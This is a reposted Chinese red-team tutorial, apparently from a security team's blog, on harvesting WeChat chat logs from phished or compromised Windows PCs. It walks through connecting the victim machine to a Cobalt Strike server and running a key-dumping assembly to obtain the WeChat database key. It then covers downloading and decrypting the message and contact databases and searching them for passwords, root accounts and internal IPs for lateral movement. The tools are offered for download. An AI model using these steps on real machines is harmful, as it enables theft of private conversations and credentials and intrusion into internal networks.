Redian新闻
>
钓鱼场景下微信聊天记录回传

钓鱼场景下微信聊天记录回传

科技

一、使用场景

钓鱼攻击(通过钓鱼 / 微信控到的机器通常都是登录状态)

渗透到运维机器(有些运维机器会日常登录自己的微信)

实战中钓鱼时常在微信聊天记录中找到目标内网系统账号、机器账号密码,尽可能的不触发大量扫描告警下在内网中精准打到跳板机。

二、获取微信聊天记录过程

在第一步需要用到,Sharp-dumpkey工具,下面对Sharp-dumpkey工具进行介绍

基于C#实现的获取微信数据库密钥的小工具,可配合chatViewTool使用。可直接执行命令.\dumpkey.exe,查看微信数据库密钥,并回传DBpass.bin文件中。

  • • 暂时不支持微信多开场景的密钥获取。

  • • 需微信登录后才可抓取密钥。

  • • 程序未采用动态获取基址的方式,因此为保证程序可用性,运行时会在线拉取基址。

在被获取权限PC端执行 .\co.exe shellcode -f .\cece.txt,可连接到CS服务器

在被获取权限PC处,右键选择Interact,可进入命令执行

1、获取微信数据库密钥,执行命令execute-assembly C:\Users\summer\Desktop\test\dumpkey.exe

回传 DBpass.bin,该文件中记录了微信数据库密钥

2、下载目标聊天数据库文件,默认保存目录在以下目录,超出 240MB 会自动生成 MSG1.db,以此类推。

C:\Users\summer\Documents\WeChat Files\wxid_vd0nxyv6n20t22\Msg\Multi\MSG0.db C:\Users\summer\Documents\WeChat Files\wxid_vd0nxyv6n20t22\Msg\MicroMsg.db

备注: MSG0.db文件存放聊天记录 MicroMsg.db文件存放好友列表

执行命令shell C:\Users\summer\Desktop\test\FileSearch.exe search C:\ MSG,可找到文件MSG0.

连接被获取权限PC的文件夹,找到目录C:\Users\summer\Documents\WeChat Files\wxid_vd0nxyv6n20t22\Msg\Multi,下载文件MSG0.db并存放到自定义目录即可

找到目录C:\Users\summer\Documents\WeChat Files\wxid_vd0nxyv6n20t22\Msg,下载文件MicroMsg.db并存放到自定义目录(与MSG0.db放到同一目录下)

在第3步之前对ChatViewTool工具进行介绍

ChatViewTool是一个配合dumpkey(微信数据库秘钥获取工具)使用的小工具,该工具实现了微信数据库解密以及展示数据库聊天记录的功能。

使用方法 在获取数据库秘钥之后将内容保存为文本文件DBPass.Bin,随后提取以下相关的数据库放于秘钥文件同目录。C:\Users\summer\Documents\WeChat Files\wxid_vd0nxyv6n20t22\Msg\Multi\MSG0.db

C:\Users\summer\Documents\WeChat Files\wxid_vd0nxyv6n20t22\Msg\MicroMsg.db

随后打开ChatViewTool点击“数据库解密”并选择秘钥及数据库所在的目录,待解密完成后

点击“查看数据库”选择同目录即可完成会话展示,双击联系人列表可展示对应的聊天记录

3、将上面DBpass.bin、MSG0.db、MicroMsg.db三个文件回传到同目录,配合 ChatViewTool 打开解密即可查看,在搜索处 “administrator” “root” “密码” “ip 等”,项目地址。

三、下载

本文中所涉及工具已在知识星球同步,可在知识星球下载。

往期推荐

敏感信息泄露

潮影在线免杀平台上线了

自动化渗透测试工具开发实践

【红蓝对抗】利用CS进行内网横向

一个Go版(更强大)的TideFinger

SRC资产导航监测平台Tsrc上线了

新潮信息-Tide安全团队2022年度总结

记一次实战攻防(打点-Edr-内网-横向-Vcenter)

E

N

D


知识星球产品及服务

团队内部平台:潮汐在线指纹识别平台 | 潮听漏洞情报平台 | 潮巡资产管理与威胁监测平台 | 潮汐网络空间资产测绘 | 潮声漏洞检测平台 | 在线免杀平台 | CTF练习平台 | 物联网固件检测平台 | SRC资产监控平台  | ......


星球分享方向:Web安全 | 红蓝对抗 | 移动安全 | 应急响应 | 工控安全 | 物联网安全 | 密码学 | 人工智能 | ctf 等方面的沟通及分享


星球知识wiki:红蓝对抗 | 漏洞武器库 | 远控免杀 | 移动安全 | 物联网安全 | 代码审计 | CTF | 工控安全 | 应急响应 | 人工智能 | 密码学 | CobaltStrike | 安全测试用例 | ......


星球网盘资料:安全法律法规 | 安全认证资料 | 代码审计 | 渗透安全工具 | 工控安全工具 | 移动安全工具 | 物联网安全 | 其它安全文库合辑  | ......

扫码加入一起学习吧~

微信扫码关注该文公众号作者

戳这里提交新闻线索和高质量文章给我们。
相关阅读
15岁女初中生为3000块, 被隔空侵犯一个月, 看完聊天记录家长彻底崩溃!我用10万条微信聊天记录「克隆」了自己一个人爱不爱你,看微信聊天就知道了苹果今晨推送新系统/ChatGPT出现泄露聊天记录的风险/英伟达ChatGPT同款超算上云成都微信群“劲爆聊天记录”曝光:老实人就该受欺负?【岛叔说】不雅聊天记录泄露,想摆平?门都没有!聊天记录搜出这句话,证明他在偷偷爱你看完河南12岁女孩“大尺度”聊天记录事件,我被那群禽兽恶心吐了......定了!刚刚正式公布:在美国的华人们彻底沸腾了! 另外,关闭下微信广告,谢谢啦贵州男干部“不雅聊天记录”曝光,到底打了谁的脸?“全区都知道咱俩开房又怎样?”河南“不雅聊天记录”曝光,到底谁才是最大受害者?行业内的聊天记录男生卖女朋友穿过的袜子日入上千?女生聊天记录曝光看呆无数人...吃瓜!某银行主任暧昧聊天记录曝光!一公务员被指不尊重女性,不雅聊天记录引热议!官方:“将处理”23岁女孩被逼婚致死,聊天记录曝光:我每天都在受折磨……“凤姐”罗玉凤在美国结婚+获得绿卡!高晓松送上祝福案例 | 用人单位擅自恢复的员工微信聊天记录,能否作为证据?美国入境档案--刘随鸣/鸿、刘随藩杭州数学组男老师出轨语文组女老师,聊天记录曝光好劲爆……多名女演员曝某导演要求陪睡,聊天记录披露细节三观尽毁!剧组回应反转了…微信聊天,别做这件事!陆房战斗考略之三(转贴)12岁女孩被“隔空猥亵”,大尺度聊天记录曝光,太恶心了……真正爱你的男人,微信聊天会有这四种表现!“聊天记录一定不要截图”除了姐妹私密聊天记录,00后更想删掉的是?河南“不雅聊天记录”曝光,到底谁才是最大受害者?马克谈天下(362)聊聊将登超级碗中场秀的蕾哈娜无意间看到老公和表姐的聊天记录,有些事情真是…细思极恐哈哈哈湖南女子“裸婚”后被流产割喉,丈夫拘留10天:聊天记录曝光,这不是家暴那么简单…巴黎---迪斯尼亲妈发“呕血脱发照”催婚,逼死23岁女儿?大量聊天记录曝光让人窒息!一个女护士的短信聊天记录!看到第2条就收藏了大量聊天记录曝光!微软聊天机器人成暴躁“键盘侠”:劝人离婚,威胁、PUA用户!马斯克:该关了它
logo
联系我们隐私协议©2024 redian.news
Redian新闻
Redian.news刊载任何文章,不代表同意其说法或描述,仅为提供更多信息,也不构成任何建议。文章信息的合法性及真实性由其作者负责,与Redian.news及其运营公司无关。欢迎投稿,如发现稿件侵权,或作者不愿在本网发表文章,请版权拥有者通知本网处理。